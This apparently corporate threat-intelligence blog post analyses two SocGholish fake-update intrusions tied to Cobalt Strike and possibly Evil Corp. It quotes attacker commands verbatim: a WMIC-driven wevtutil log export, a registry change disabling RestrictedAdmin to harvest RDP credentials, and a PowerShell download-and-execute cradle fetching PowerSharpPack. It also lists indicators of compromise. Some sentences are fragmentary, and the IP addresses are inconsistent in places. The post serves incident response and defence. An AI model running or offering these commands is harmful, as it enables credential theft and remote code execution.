Editor’s note: Dean Murphy, Brandon Tirado, and Joseph Morales all contributed to this blog.
The “SocGholish” (aka FakeUpdates) malware distribution framework has presented a gripping tale of intrigue and suspense for ReliaQuest this year. Just in January, we’ve identified and responded to two discrete “hands-on-keyboard” intrusions traced back to a SocGholish compromise. We contained both intrusions by preventing what looked like the threat actor’s primary objective: deploying ransomware.
Think of SocGholish as, primarily, a preliminary foothold to provide access for additional cyber-crime groups. With these two intrusions, we found overlapping artifacts suggesting that the compromises are sourcing from the same threat actor. During our investigations network telemetry was found belonging to Evil Corp infrastructure, possibly indicating their involvement in this. Read on to find out what else we observed in this page-turner of an assessment.
What Is SocGholish?
Figure 1: SocGholish fake update link
Notable Findings: Network
Telemetry sources for our investigations into these events rely on information fed into GreyMatter by our customers. This gives us increased visibility, unifies disparate workflows, and allows quicker responses to active intrusions.
taxes[.]rpacx[.]com.”; HTML DOM represents the structure of the website. It was hosting the stage 2 SocGholish payload: the fake update.
Figure 2: SocGholish site details
Figure 3: SOCGholish HTML DOM
wscript.exe) sprang into action to execute it. Execution of a payload established C2 with a stage 3 site. In these intrusions sets, the stage 3 sites were:
These connections were used to receive further instruction and relay the outputs of initial discovery commands staged in TXT files, located at the filepath
When reviewing the IP addresses hosting the stage 3 domains, we discovered another commonality. Both domains resolved to the same IP address: 126.96.36.199. The VirusTotal passive DNS entry for this IP address showed various subdomains being used.
We also found similar payloads tied to that IP address. We used the following VirusTotal intelligence query:
type:js AND name:update.js AND contacted_ip:188.8.131.52
Figure 4: VirusTotal Intelligence Query
Figure 5: Passive DNS replications for 88.119.169[.]108
Shortly after the initial compromises, the threat actor used the SocGholish C2 channels to transfer a Cobalt Strike HTTPS beacon to the compromised hosts. Intrusion set 1 showed that the HTTPS beacon established a C2 channel with the C2 server change-land[.]com (31.184.254[.]115). These were the initial signals identified by the ReliaQuest Threat Hunting team that prompted a response. As it turns out, the domain belongs to a cluster of infrastructure that we feel moderately confident is used by the notorious Evil Corp cyber-crime syndicate.
The remaining artifacts observed relate to Intrusion set 1. Due to a combination of a swift response and a dormant threat actor in Intrusion set 2, no additional post-exploitation initiatives were carried out following the HTTP beacon executing.
With the HTTPS beacon executing, additional information discovery efforts took place and enabled the threat actor to start attempting to move laterally. In this intrusion set, the threat actor seemed to favor an interactive session, making use of remote desktop protocol (RDP) and a valid admin account to pivot to a server on the network. Success led to even more discovery efforts from this endpoint. Of those discovery efforts, most were “textbook” ransomware affiliate operations, but one operation stood out.
Notable Findings: Endpoint
The Windows Management Instrumentation Command-line (WMIC) was used to connect to a domain controller to execute this command:
"wmic /node:redacted.remote.host process call create 'wevtutil epl Security C:\\programdata\\redacted.evtx /q:Event[System[(EventID=4776)]]
This command uses
wevtutil to retrieve the Windows Security Event ID 4776 (the domain controller attempted to validate the credentials for an account) logs from the domain controller and store the output within this drive:
Typically, we’ve observed
wevtutil used for defense evasion, but something else seems afoot here; it was used for discovery objectives, although—at the time of writing—we haven’t found any other public reporting of this utility being used maliciously in this way.
The plotline ebbed a bit at this point, as activity ceased for roughly three days. It resumed with this attacker’s Windows binary of choice: WMIC, used to execute the following command to disable Windows RestrictedAdmin Mode.
process call create cmd /c reg add hklm\\System\\CurrentControlSet\\Control\\LSA /f /v disablerestrictedadmin /t REG_DWORD /d 0
This feature, when enabled, prevents credentials used to connect to a remote system via RDP from being stored in memory. With the attacker seen disabling RestrictedAdmin Mode on the endpoint they were operating on, we inferred that they were looking to intercept the credentials of those who would RDP to this device in the future. Access to the credential owners’ password hashes could help facilitate a “pass the hash” attack via RDP: stealing a “hashed” user credential to create a new user session on the same network.
On an adjacent host, we observed WMIC being used to execute a PowerShell download cradle; the following command was run to pull down and execute the UrbanBishop module of PowerSharpPack, which was hosted in a GitHub repository.
iex(newobjectnet.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1'); PowerSharpPack -UrbanBishop -Command '-i 9876 -p' CC:\programdata\ch.tmp'.
The intent of this specific activity is strange, as previous evidence showed that the threat actor was making use of their Cobalt Strike HTTP beacon. Why the attacker decided to perform ingress tool transfer for an additional way to perform process injection has been inconclusive at this time.
And that’s the end of the saga; after this point, the intrusion was contained, and the threat actor evicted from the customer’s environment.
SocGholish is well practiced in such plotlines: disguising fake updates and tricking browser or system users into malicious downloads. In other words, don’t take it lightly. As demonstrated by the events above, a SocGholish infection can lead to a much more severe situation than just an infected endpoint. We’re highly confident that the attacker’s final objective was to deploy ransomware, based on their techniques, infrastructure ties to Evil Corp, and intelligence on previous intrusions that started with SocGholish.
The ReliaQuest GreyMatter security operations platform empowers customers to investigate, detect, and respond to the threats that matter most. The platform increases visibility to help you get the most out of your existing security investments and reduces the complexity of the DIR lifecycle. This ultimately allows ReliaQuest and our customers to efficiently counter known and emerging threats. We provide customers with detection capabilities and actionable intelligence to hinder the implications of a SocGholish infection. Here are some agnostic recommendations for any environment to help combat this threat:
Ensure effective logging is in place to identify the initial compromise and any subsequent implications. This telemetry should be shipped to a centralized logging platform to enable detection capabilities.
- Endpoint telemetry, in particular, is vital. Events such as process execution (with command line), registry modification, and file modifications are a good place to start. These logs will help.
- Network telemetry (firewall, netflow, forward proxy, etc.) is also important. These logs, paired with threat intelligence, can help identify traffic to known compromised sites delivering SocGholish payloads as well as the C2 infrastructure used after a breach.
Train staff to identify social engineering tactics employed on the web. SocGholish uses social engineering to prompt Internet users to download fraudulent browser or system upgrades.
- Launch a channel for employees to report social engineering attempts they’ve spotted (or fallen for).
- Supply employees with trusted local or remote sites for software updates.
taxes.rpacx[.]com(SocGholish stage 2 domain)
*.signing.unitynotarypublic[.]com(SocGholish C2 domain)
*.asset.tradingvein[.]xyz(SocGholish C2 domain)
88.119.169[.]108(SocGholish C2 IP)
change-land[.]com(Cobalt Strike C2)
31.184.254[.]115(Cobalt Strike C2)